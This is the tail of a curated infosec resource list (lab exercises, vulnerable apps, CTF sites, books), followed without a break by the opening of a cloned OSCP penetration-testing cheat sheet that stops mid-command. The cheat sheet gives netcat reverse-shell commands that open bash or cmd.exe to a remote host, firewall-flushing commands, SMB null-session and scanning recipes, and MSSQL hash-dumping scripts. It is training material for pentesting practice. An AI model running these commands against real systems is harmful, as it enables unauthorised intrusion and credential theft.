FILE](https://pentesterlab.com/exercises/xss_and_mysql_file)<br> This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it. - [Axis2 Web service and Tomcat Manager](https://pentesterlab.com/exercises/axis2_and_tomcat_manager)<br> This exercice explains the interactions between Tomcat and Apache, then it will show you how to call and attack an Axis2 Web service. Using information retrieved from this attack, you will be able to gain access to the Tomcat Manager and deploy a WebShell to gain commands execution. - [Play Session Injection](https://pentesterlab.com/exercises/play_session_injection)<br> This exercise covers the exploitation of a session injection in the Play framework. This issue can be used to tamper with the content of the session while bypassing the signing mechanism. - [Play XML Entities](https://pentesterlab.com/exercises/play_xxe)<br> This exercise covers the exploitation of a XML entities in the Play framework. - [CVE-2007-1860: mod_jk double-decoding](https://pentesterlab.com/exercises/cve-2007-1860)<br> This exercise covers the exploitation of CVE-2007-1860. This vulnerability allows an attacker to gain access to unaccessible pages using crafted requests. This is a common trick that a lot of testers miss. - [CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability](https://pentesterlab.com/exercises/cve-2008-1930)<br> This exercise explains how you can exploit CVE-2008-1930 to gain access to the administration interface of a Wordpress installation. - [CVE-2012-1823: PHP CGI](https://pentesterlab.com/exercises/cve-2012-1823)<br> This exercise explains how you can exploit CVE-2012-1823 to retrieve the source code of an application and gain code execution. - [CVE-2012-2661: ActiveRecord SQL injection](https://pentesterlab.com/exercises/cve-2012-2661)<br> This exercise explains how you can exploit CVE-2012-2661 to retrieve information from a database. - [CVE-2012-6081: MoinMoin code execution](https://pentesterlab.com/exercises/cve-2012-6081)<br> This exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian's wiki and Python documentation website. - [CVE-2014-6271/Shellshock](https://pentesterlab.com/exercises/cve-2014-6271)<br> This exercise covers the exploitation of a Bash vulnerability through a CGI. ## Dr. Thorsten Schneider's Binary Auditing Learn the fundamentals of Binary Auditing. Know how HLL mapping works, get more inner file understanding than ever. Learn how to find and analyse software vulnerability. Dig inside Buffer Overflows and learn how exploits can be prevented. Start to analyse your first viruses and malware the safe way. Learn about simple tricks and how viruses look like using real life examples. - [Binary Auditing](http://www.binary-auditing.com/) ## Damn Vulnerable Web Application (DVWA) Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment. - [Damn Vulnerable Web Application (DVWA)](https://github.com/ethicalhack3r/DVWA) ## Damn Vulnerable Web Services Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities. The aim of this project is to help security professionals learn about Web Application Security through the use of a practical lab environment. - [Damn Vulnerable Web Services](https://github.com/snoopysecurity/dvws) ## NOWASP (Mutillidae) OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. With dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software. - [OWASP Mutillidae](http://sourceforge.net/projects/mutillidae/files/) ## OWASP Broken Web Applications Project Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost and commercial VMware products. - [OWASP Broken Web Applications Project](https://sourceforge.net/projects/owaspbwa/files/1.2/) ## OWASP Bricks Bricks is a web application security learning platform built on PHP and MySQL. The project focuses on variations of commonly seen application security issues. Each 'Brick' has some sort of security issue which can be leveraged manually or using automated software tools. The mission is to 'Break the Bricks' and thus learn the various aspects of web application security. - [OWASP Bricks](http://sechow.com/bricks/download.html) ## OWASP Hackademic Challenges Project The Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe and controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through an attacker's perspective. - [OWASP Hackademic Challenges project](https://github.com/Hackademic/hackademic/) ## Web Attack and Exploitation Distro (WAED) The Web Attack and Exploitation Distro (WAED) is a lightweight virtual machine based on Debian Distribution. WAED is pre-configured with various real-world vulnerable web applications in a sandboxed environment. It includes pentesting tools that aid in finding web application vulnerabilities. The main motivation behind this project is to provide a practical environment to learn about web application's vulnerabilities without the hassle of dealing with complex configurations. Currently, there are around 18 vulnerable applications installed in WAED. - [Web Attack and Exploitation Distro (WAED)](http://www.waed.info/) ## Xtreme Vulnerable Web Application (XVWA) XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security. It’s not advisable to host this application online as it is designed to be “Xtremely Vulnerable”. We recommend hosting this application in local/controlled environment and sharpening your application security ninja skills with any tools of your own choice. It’s totally legal to break or hack into this. The idea is to evangelize web application security to the community in possibly the easiest and fundamental way. Learn and acquire these skills for good purpose. How you use these skills and knowledge base is not our responsibility. - [Xtreme Vulnerable Web Application (XVWA)](https://github.com/s4n7h0/xvwa) ## WebGoat: A deliberately insecure Web Application WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons. - [WebGoat](https://github.com/WebGoat/WebGoat) ## Audi-1's SQLi-LABS SQLi-LABS is a comprehensive test bed to Learn and understand nitti gritty of SQL injections and thereby helps professionals understand how to protect. - [SQLi-LABS](https://github.com/Audi-1/sqli-labs) - [SQLi-LABS Videos](http://www.securitytube.net/user/Audi) Capture the Flag ================ #### Hack The Box This pentester training platform/lab is full of machines (boxes) to hack on the different difficulty level. Majority of the content generated by the community and released on the website after the staff's approval. Besides boxes users also can pick static challenges or work on advanced tasks like Fortress or Endgame. - [Hack The Box link](https://www.hackthebox.eu/) #### Vulnhub We all learn in different ways: in a group, by yourself, reading books, watching/listening to other people, making notes or things out for yourself. Learning the basics & understanding them is essential; this knowledge can be enforced by then putting it into practice. Over the years people have been creating these resources and a lot of time has been put into them, creating 'hidden gems' of training material. However, unless you know of them, its hard to discover them. So VulnHub was born to cover as many as possible, creating a catalogue of 'stuff' that is (legally) 'breakable, hackable & exploitable' - allowing you to learn in a safe environment and practice 'stuff' out. When something is added to VulnHub's database it will be indexed as best as possible, to try and give you the best match possible for what you're wishing to learn or experiment with. - [Vulnhub Repository](https://www.vulnhub.com/) #### CTF Write Ups - [CTF Resources](https://ctfs.github.io/resources)<br> A general collection of information, tools, and tips regarding CTFs and similar security competitions. - [CTF write-ups 2016](https://github.com/ctfs/write-ups-2016)<br> Wiki-like CTF write-ups repository, maintained by the community. (2015) - [CTF write-ups 2015](https://github.com/ctfs/write-ups-2015)<br> Wiki-like CTF write-ups repository, maintained by the community. (2015) - [CTF write-ups 2014](https://github.com/ctfs/write-ups-2014)<br> Wiki-like CTF write-ups repository, maintained by the community. (2014) - [CTF write-ups 2013](https://github.com/ctfs/write-ups-2013)<br> Wiki-like CTF write-ups repository, maintained by the community. (2013) ### CTF Repos - [captf](http://captf.com)<br> This site is primarily the work of psifertex since he needed a dump site for a variety of CTF material and since many other public sites documenting the art and sport of Hacking Capture the Flag events have come and gone over the years. - [shell-storm](http://shell-storm.org/repo/CTF)<br> The Jonathan Salwan's little corner. ### CTF Courses - [Hopper's Roppers CTF Course](https://hoppersroppers.github.io/courseCTF.html)<br> Free course designed to teach the fundamentals of Forensics, Cryptography, and Web-Exploitation required to be successful in Capture the Flag competitions. At the end of the course, students compete in the picoCTF event with guidance from instructors. SecurityTube Playlists ====================== Security Tube hosts a large range of video tutorials on IT security including penetration testing , exploit development and reverse engineering. * [SecurityTube Metasploit Framework Expert (SMFE)](http://www.securitytube.net/groups?operation=view&groupId=10)<br> This video series covers basics of Metasploit Framework. We will look at why to use metasploit then go on to how to exploit vulnerbilities with help of metasploit and post exploitation techniques with meterpreter. * [Wireless LAN Security and Penetration Testing Megaprimer](http://www.securitytube.net/groups?operation=view&groupId=9)<br> This video series will take you through a journey in wireless LAN (in)security and penetration testing. We will start from the very basics of how WLANs work, graduate to packet sniffing and injection attacks, move on to audit infrastructure vulnerabilities, learn to break into WLAN clients and finally look at advanced hybrid attacks involving wireless and applications. * [Exploit Research Megaprimer](http://www.securitytube.net/groups?operation=view&groupId=7)<br> In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find Zero Day vulnerabilities in both open and closed source software. * [Buffer Overflow Exploitation Megaprimer for Linux](http://www.securitytube.net/groups?operation=view&groupId=4)<br> In this video series, we will understand the basic of buffer overflows and understand how to exploit them on linux based systems. In later videos, we will also look at how to apply the same principles to Windows and other selected operating systems. Open Security Books =================== #### Crypto 101 - lvh Comes with everything you need to understand complete systems such as SSL/TLS: block ciphers, stream ciphers, hash functions, message authentication codes, public key encryption, key agreement protocols, and signature algorithms. Learn how to exploit common cryptographic flaws, armed with nothing but a little time and your favorite programming language. Forge administrator cookies, recover passwords, and even backdoor your own random number generator. - [Crypto101](https://www.crypto101.io/) - [LaTeX Source](https://github.com/crypto101/book) #### A Graduate Course in Applied Cryptography - Dan Boneh & Victor Shoup This book is about constructing practical cruptosystems for which we can argue security under plausible assumptions. The book covers many constructions for different tasks in cryptography. For each task we define the required goal. To analyze the constructions, we develop a unified framework for doing cryptographic proofs. A reader who masters this framework will capable of applying it to new constructions that may not be covered in this book. We describe common mistakes to avoid as well as attacks on real-world systems that illustratre the importance of rigor in cryptography. We end every chapter with a fund application that applies the ideas in the chapter in some unexpected way. - [A Graduate Course in Applied Cryptography](https://crypto.stanford.edu/~dabo/cryptobook/) #### Security Engineering, A Guide to Building Dependable Distributed Systems - Ross Anderson The world has changed radically since the first edition of this book was published in 2001. Spammers, virus writers, phishermen, money launderers, and spies now trade busily with each other in a lively online criminal economy and as they specialize, they get better. In this indispensable, fully updated guide, Ross Anderson reveals how to build systems that stay dependable whether faced with error or malice. Here?s straight talk on critical topics such as technical engineering basics, types of attack, specialized protection mechanisms, security psychology, policy, and more. - [Security Engineering, Second Edition](https://www.cl.cam.ac.uk/~rja14/book.html) #### Reverse Engineering for Beginners - Dennis Yurichev This book offers a primer on reverse-engineering, delving into disassembly code-level reverse engineering and explaining how to decipher assembly language for those beginners who would like to learn to understand x86 (which accounts for almost all executable software in the world) and ARM code created by C/C++ compilers. - [Reverse Engineering for Beginners](http://beginners.re/) - [LaTeX Source](https://github.com/dennis714/RE-for-beginners) #### CTF Field Guide - Trail of Bits The focus areas that CTF competitions tend to measure are vulnerability discovery, exploit creation, toolkit creation, and operational tradecraft.. Whether you want to succeed at CTF, or as a computer security professional, you'll need to become an expert in at least one of these disciplines. Ideally in all of them. - [CTF Field Guide](https://trailofbits.github.io/ctf/) - [Markdown Source](https://github.com/trailofbits/ctf) Challenges ========== - [Reverse Engineering Challenges](https://challenges.re/) - [Matasano Crypto Challenges](http://cryptopals.com/) Documentation ============= #### OWASP - Open Web Application Security Project The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. - [Open Web Application Security Project](https://www.owasp.org/index.php/Main_Page) #### Applied Crypto Hardening - bettercrypto.org This guide arose out of the need for system administrators to have an updated, solid, well re-searched and thought-through guide for configuring SSL, PGP,SSH and other cryptographic tools in the post-Snowdenage. Triggered by the NSA leaks in the summer of 2013, many system administrators and IT security officers saw the need to strengthen their encryption settings.This guide is specifically written for these system administrators. - [Applied Crypto Hardening](https://bettercrypto.org/static/applied-crypto-hardening.pdf) - [LaTeX Source](https://github.com/BetterCrypto/Applied-Crypto-Hardening) #### PTES - Penetration Testing Execution Standard The penetration testing execution standard cover everything related to a penetration test - from the initial communication and reasoning behind a pentest, through the intelligence gathering and threat modeling phases where testers are working behind the scenes in order to get a better understanding of the tested organization, through vulnerability research, exploitation and post exploitation, where the technical security expertise of the testers come to play and combine with the business understanding of the engagement, and finally to the reporting, which captures the entire process, in a manner that makes sense to the customer and provides the most value to it. - [Penetration Testing Execution Standard](http://www.pentest-standard.org/index.php/Main_Page) Related Awesome Lists ===================== - [Awesome Pentest](https://github.com/enaqx/awesome-pentest)<br> A collection of awesome penetration testing resources, tools and other shiny things. - [Awesome Appsec](https://github.com/paragonie/awesome-appsec)<br> A curated list of resources for learning about application security. - [Awesome Malware Analysis](https://github.com/rshipp/awesome-malware-analysis)<br> A curated list of awesome malware analysis tools and resources. - [Android Security Awesome](https://github.com/ashishb/android-security-awesome)<br> A collection of android security related resources. - [Awesome CTF](https://github.com/apsdehal/awesome-ctf)<br> A curated list of CTF frameworks, libraries, resources and softwares. - [Awesome Security](https://github.com/sbilly/awesome-security)<br> A collection of awesome software, libraries, documents, books, resources and cools stuffs about security. - [Awesome Honeypots](https://github.com/paralax/awesome-honeypots)<br> A curated list of awesome honeypots, tools, components and much more. - [Awesome Incident Response](https://github.com/meirwah/awesome-incident-response)<br> A curated list of tools and resources for security incident response, aimed to help security analysts and DFIR teams. - [Awesome Threat Intelligence](https://github.com/hslatman/awesome-threat-intelligence)<br> A curated list of awesome Threat Intelligence resources. - [Awesome PCAP Tools](https://github.com/caesar0301/awesome-pcaptools)<br> A collection of tools developed by other researchers in the Computer Science area to process network traces. - [Awesome Forensics](https://github.com/Cugu/awesome-forensics)<br> A curated list of awesome forensic analysis tools and resources. - [Awesome Hacking](https://github.com/carpedm20/awesome-hacking)<br> A curated list of awesome Hacking tutorials, tools and resources. - [Awesome Industrial Control System Security](https://github.com/hslatman/awesome-industrial-control-system-security)<br> A curated list of resources related to Industrial Control System (ICS) security. - [Awesome Web Hacking](https://github.com/infoslack/awesome-web-hacking)<br> This list is for anyone wishing to learn about web application security but do not have a starting point. - [Awesome Sec Talks](https://github.com/PaulSec/awesome-sec-talks)<br> A curated list of awesome Security talks. - [Awesome YARA](https://github.com/InQuest/awesome-yara)<br> A curated list of awesome YARA rules, tools, and people. - [Sec Lists](https://github.com/danielmiessler/SecLists)<br> SecLists is the security tester's companion. It is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more. [Contributing](https://github.com/onlurking/awesome-infosec/blob/master/contributing.md) ===================== Pull requests and issues with suggestions are welcome! License ======= [![Creative Commons License](http://i.creativecommons.org/l/by/4.0/88x31.png)](http://creativecommons.org/licenses/by/4.0/) This work is licensed under a [Creative Commons Attribution 4.0 International License](http://creativecommons.org/licenses/by/4.0/).
**This is a clone of [frizb/OSCP-Survival-Guide](https://github.com/frizb/OSCP-Survival-Guide)** **This can also be viewed on [x89k.tk](https://x89k.tk/infosec/2018/11/03/oscpsurvivalguide.html)** # OSCP-Survival-Guide **NOTE: This document refers to the target ip as the export variable $ip.** **To set this value on the command line use the following syntax:** **export ip=192.168.1.100** ## [](#table-of-contents)Table of Contents * [Kali Linux](#kali-linux) * [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning) * [Passive Information Gathering](#passive-information-gathering) * [Active Information Gathering](#active-information-gathering) * [Port Scanning](#port-scanning) * [Enumeration](#enumeration) * [HTTP Enumeration](#http-enumeration) * [Buffer Overflows and Exploits](#buffer-overflows-and-exploits) * [Shells](#shells) * [File Transfers](#file-transfers) * [Privilege Escalation](#privilege-escalation) * [Linux Privilege Escalation](#linux-privilege-escalation) * [Windows Privilege Escalation](#windows-privilege-escalation) * [Client, Web and Password Attacks](#client-web-and-password-attacks) * [Client Attacks](#client-attacks) * [Web Attacks](#web-attacks) * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities) * [Database Vulnerabilities](#database-vulnerabilities) * [Password Attacks](#password-attacks) * [Password Hash Attacks](#password-hash-attacks) * [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling) * [The Metasploit Framework](#the-metasploit-framework) * [Bypassing Antivirus Software](#bypassing-antivirus-software) # [](#kali-linux)Kali Linux * Set the Target IP Address to the `$ip` system variable `export ip=192.168.1.100` * Find the location of a file `locate sbd.exe` * Search through directories in the `$PATH` environment variable `which sbd` * Find a search for a file that contains a specific string in it’s name: `find / -name sbd\*` * Show active internet connections `netstat -lntp` * Change Password `passwd` * Verify a service is running and listening `netstat -antp |grep apache` * Start a service `systemctl start ssh` `systemctl start apache2` * Have a service start at boot `systemctl enable ssh` * Stop a service `systemctl stop ssh` * Unzip a gz file `gunzip access.log.gz` * Unzip a tar.gz file `tar -xzvf file.tar.gz` * Search command history `history | grep phrase_to_search_for` * Download a webpage `wget http://www.cisco.com` * Open a webpage `curl http://www.cisco.com` * String manipulation * Count number of lines in file `wc -l index.html` * Get the start or end of a file `head index.html` `tail index.html` * Extract all the lines that contain a string `grep "href=" index.html` * Cut a string by a delimiter, filter results then sort `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u` * Using Grep and regular expressions and output to a file `cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt` * Use a bash loop to find the IP address behind each host `for url in $(cat list.txt); do host $url; done` * Collect all the IP Addresses from a log file and sort by frequency `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn` * Decoding using Kali * Decode Base64 Encoded Values `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode` * Decode Hexidecimal Encoded Values `echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps` * Netcat - Read and write TCP and UDP Packets * Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):[https://joncraton.org/blog/46/netcat-for-windows/](http://web.archive.org/web/20171113221652/https://joncraton.org/blog/46/netcat-for-windows/) * Connect to a POP3 mail server `nc -nv $ip 110` * Listen on TCP/UDP port `nc -nlvp 4444` * Connect to a netcat port `nc -nv $ip 4444` * Send a file using netcat `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe` * Receive a file using netcat `nc -nlvp 4444 > incoming.exe` * Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that... whereis nc nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz /bin/nc.traditional -e /bin/bash 1.2.3.4 4444 * Create a reverse shell with Ncat using cmd.exe on Windows `nc.exe -nlvp 4444 -e cmd.exe` or `nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe` * Create a reverse shell with Ncat using bash on Linux `nc -nv $ip 4444 -e /bin/bash` * Netcat for Banner Grabbing: `echo "" | nc -nv -w1 <IP Address> <Ports>` * Ncat - Netcat for Nmap project which provides more security avoid IDS * Reverse shell from windows using cmd.exe using ssl `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl` * Listen on port 4444 using ssl `ncat -v $ip 4444 --ssl` * Wireshark * Show only SMTP (port 25) and ICMP traffic: `tcp.port eq 25 or icmp` * Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet: `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16` * Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs: `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip` * Some commands are equal `ip.addr == xxx.xxx.xxx.xxx` Equals `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx` `ip.addr != xxx.xxx.xxx.xxx` Equals `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx` * Tcpdump * Display a pcap file `tcpdump -r passwordz.pcap` * Display ips and filter and sort `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head` * Grab a packet capture on port 80 `tcpdump tcp port 80 -w output.pcap -i eth0` * Check for ACK or PSH flag set in a TCP packet `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap` * Dsniff * Display a pcap file with telnet protocol `dsniff -p ch2.pcap` * IPTables * Deny traffic to ports except for Local Loopback `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP` `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP` * Clear ALL IPTables firewall rules ```bash iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT iptables -t nat -F iptables -t mangle -F iptables -F iptables -X iptables -t raw -F iptables -t raw -X ``` # [](#information-gathering--vulnerability-scanning)Information Gathering & Vulnerability Scanning * ## [](#passive-information-gathering)Passive Information Gathering * Google Hacking * Google search to find website sub domains `site:microsoft.com` * Google filetype, and intitle `intitle:"netbotz appliance" "OK" -filetype:pdf` * Google inurl `inurl:"level/15/sexec/-/show"` * Google Hacking Database: [https://www.exploit-db.com/google-hacking-database/](http://web.archive.org/web/20171113221652/https://www.exploit-db.com/google-hacking-database/) * SSL Certificate Testing [https://www.ssllabs.com/ssltest/analyze.html](http://web.archive.org/web/20171113221652/https://www.ssllabs.com/ssltest/analyze.html) * Email Harvesting * Simply Email `git clone https://github.com/killswitch-GUI/SimplyEmail.git` `./SimplyEmail.py -all -e TARGET-DOMAIN` * LDAP * LDAP null bind `ldapsearch -x -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -H "ldap://challenge01.root-me.org:54013"` * Netcraft * Determine the operating system and tools used to build a site [https://searchdns.netcraft.com/](http://web.archive.org/web/20171113221652/https://searchdns.netcraft.com/) * Whois Enumeration `whois domain-name-here.com` `whois $ip` * Banner Grabbing * `nc -v $ip 25` * `telnet $ip 25` * `nc TARGET-IP 80` * Recon-ng - full-featured web reconnaissance framework written in Python * `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git` `cd /opt/recon-ng` `./recon-ng` `show modules` `help` * ## [](#active-information-gathering)Active Information Gathering * ## [](#port-scanning)Port Scanning _Subnet Reference Table_ <table> <thead> <tr> <th>/</th> <th>Addresses</th> <th>Hosts</th> <th>Netmask</th> <th>Amount of a Class C</th> </tr> </thead> <tbody> <tr> <td>/30</td> <td>4</td> <td>2</td> <td>255.255.255.252</td> <td>1/64</td> </tr> <tr> <td>/29</td> <td>8</td> <td>6</td> <td>255.255.255.248</td> <td>1/32</td> </tr> <tr> <td>/28</td> <td>16</td> <td>14</td> <td>255.255.255.240</td> <td>1/16</td> </tr> <tr> <td>/27</td> <td>32</td> <td>30</td> <td>255.255.255.224</td> <td>1/8</td> </tr> <tr> <td>/26</td> <td>64</td> <td>62</td> <td>255.255.255.192</td> <td>1/4</td> </tr> <tr> <td>/25</td> <td>128</td> <td>126</td> <td>255.255.255.128</td> <td>1/2</td> </tr> <tr> <td>/24</td> <td>256</td> <td>254</td> <td>255.255.255.0</td> <td>1</td> </tr> <tr> <td>/23</td> <td>512</td> <td>510</td> <td>255.255.254.0</td> <td>2</td> </tr> <tr> <td>/22</td> <td>1024</td> <td>1022</td> <td>255.255.252.0</td> <td>4</td> </tr> <tr> <td>/21</td> <td>2048</td> <td>2046</td> <td>255.255.248.0</td> <td>8</td> </tr> <tr> <td>/20</td> <td>4096</td> <td>4094</td> <td>255.255.240.0</td> <td>16</td> </tr> <tr> <td>/19</td> <td>8192</td> <td>8190</td> <td>255.255.224.0</td> <td>32</td> </tr> <tr> <td>/18</td> <td>16384</td> <td>16382</td> <td>255.255.192.0</td> <td>64</td> </tr> <tr> <td>/17</td> <td>32768</td> <td>32766</td> <td>255.255.128.0</td> <td>128</td> </tr> <tr> <td>/16</td> <td>65536</td> <td>65534</td> <td>255.255.0.0</td> <td>256</td> </tr> </tbody> </table> * Set the ip address as a variable `export ip=192.168.1.100` `nmap -A -T4 -p- $ip` * Netcat port Scanning `nc -nvv -w 1 -z $ip 3388-3390` * Discover active IPs usign ARP on the network: `arp-scan $ip/24` * Discover who else is on the network `netdiscover` * Discover IP Mac and Mac vendors from ARP `netdiscover -r $ip/24` * Nmap stealth scan using SYN `nmap -sS $ip` * Nmap stealth scan using FIN `nmap -sF $ip` * Nmap Banner Grabbing `nmap -sV -sT $ip` * Nmap OS Fingerprinting `nmap -O $ip` * Nmap Regular Scan: `nmap $ip/24` * Enumeration Scan `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt` * Enumeration Scan All Ports TCP / UDP and output to a txt file `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip` * Nmap output to a file: `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24` * Quick Scan: `nmap -T4 -F $ip/24` * Quick Scan Plus: `nmap -sV -T4 -O -F --version-light $ip/24` * Quick traceroute `nmap -sn --traceroute $ip` * All TCP and UDP Ports `nmap -v -sU -sS -p- -A -T4 $ip` * Intense Scan: `nmap -T4 -A -v $ip` * Intense Scan Plus UDP `nmap -sS -sU -T4 -A -v $ip/24` * Intense Scan ALL TCP Ports `nmap -p 1-65535 -T4 -A -v $ip/24` * Intense Scan - No Ping `nmap -T4 -A -v -Pn $ip/24` * Ping scan `nmap -sn $ip/24` * Slow Comprehensive Scan `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24` * Scan with Active connect in order to weed out any spoofed ports designed to troll you `nmap -p1-65535 -A -T5 -sT $ip` * ## [](#enumeration)Enumeration * DNS Enumeration * NMAP DNS Hostnames Lookup `nmap -F --dns-server <dns server ip> <target ip range>` * Host Lookup `host -t ns megacorpone.com` * Reverse Lookup Brute Force - find domains in the same range `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"` * Perform DNS IP Lookup `dig a domain-name-here.com @nameserver` * Perform MX Record Lookup `dig mx domain-name-here.com @nameserver` * Perform Zone Transfer with DIG `dig axfr domain-name-here.com @nameserver` * DNS Zone Transfers Windows DNS zone transfer `nslookup -> set type=any -> ls -d blah.com` Linux DNS zone transfer `dig axfr blah.com @ns1.blah.com` * Dnsrecon DNS Brute Force `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml` * Dnsrecon DNS List of megacorp `dnsrecon -d megacorpone.com -t axfr` * DNSEnum `dnsenum zonetransfer.me` * NMap Enumeration Script List: * NMap Discovery [_https://nmap.org/nsedoc/categories/discovery.html_](http://web.archive.org/web/20171113221652/https://nmap.org/nsedoc/categories/discovery.html) * Nmap port version detection MAXIMUM power `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>` * NFS (Network File System) Enumeration * Show Mountable NFS Shares `nmap -sV --script=nfs-showmount $ip` * RPC (Remote Procedure Call) Enumeration * Connect to an RPC share without a username and password and enumerate privledges `rpcclient --user="" --command=enumprivs -N $ip` * Connect to an RPC share with a username and enumerate privledges `rpcclient --user="<Username>" --command=enumprivs $ip` * SMB Enumeration * SMB OS Discovery `nmap $ip --script smb-os-discovery.nse` * Nmap port scan `nmap -v -p 139,445 -oG smb.txt $ip-254` * Netbios Information Scanning `nbtscan -r $ip/24` * Nmap find exposed Netbios servers `nmap -sU --script nbstat.nse -p 137 $ip` * Nmap all SMB scripts scan `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip` * Nmap all SMB scripts authenticated scan `nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip` * SMB Enumeration Tools `nmblookup -A $ip` `smbclient //MOUNT/share -I $ip -N` `rpcclient -U "" $ip` `enum4linux $ip` `enum4linux -a $ip` * SMB Finger Printing `smbclient -L //$ip` * Nmap Scan for Open SMB Shares `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24` * Nmap scans for vulnerable SMB Servers `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip` * Nmap List all SMB scripts installed `ls -l /usr/share/nmap/scripts/smb*` * Enumerate SMB Users `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14` OR `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip` * RID Cycling - Null Sessions `ridenum.py $ip 500 50000 dict.txt` * Manual Null Session Testing Windows: `net use \\$ip\IPC$ "" /u:""` Linux: `smbclient -L //$ip` * SMTP Enumeration - Mail Severs * Verify SMTP port using Netcat `nc -nv $ip 25` * POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet root@kali:~# telnet $ip 110 +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready USER billydean +OK PASS password +OK Welcome billydean list +OK 2 1807 1 786 2 1021 retr 1 +OK Message follows From: jamesbrown@motown.com Dear Billy Dean, Here is your login for remote desktop ... try not to forget it this time! username: billydean password: PA$$W0RD!Z * SNMP Enumeration -Simple Network Management Protocol * Fix SNMP output values so they are human readable `apt-get install snmp-mibs-downloader download-mibs` `echo "" > /etc/snmp/snmp.conf` * SNMP Enumeration Commands * `snmpcheck -t $ip -c public` * `snmpwalk -c public -v1 $ip 1|` * `grep hrSWRunName|cut -d\* \* -f` * `snmpenum -t $ip` * `onesixtyone -c names -i hosts` * SNMPv3 Enumeration `nmap -sV -p 161 --script=snmp-info $ip/24` * Automate the username enumeration process for SNMPv3: `apt-get install snmp snmp-mibs-downloader` `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb` * SNMP Default Credentials /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt * MS SQL Server Enumeration * Nmap Information Gathering `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip` * Webmin and miniserv/0.01 Enumeration - Port 10000 Test for LFI & file disclosure vulnerability by grabbing /etc/passwd `curl 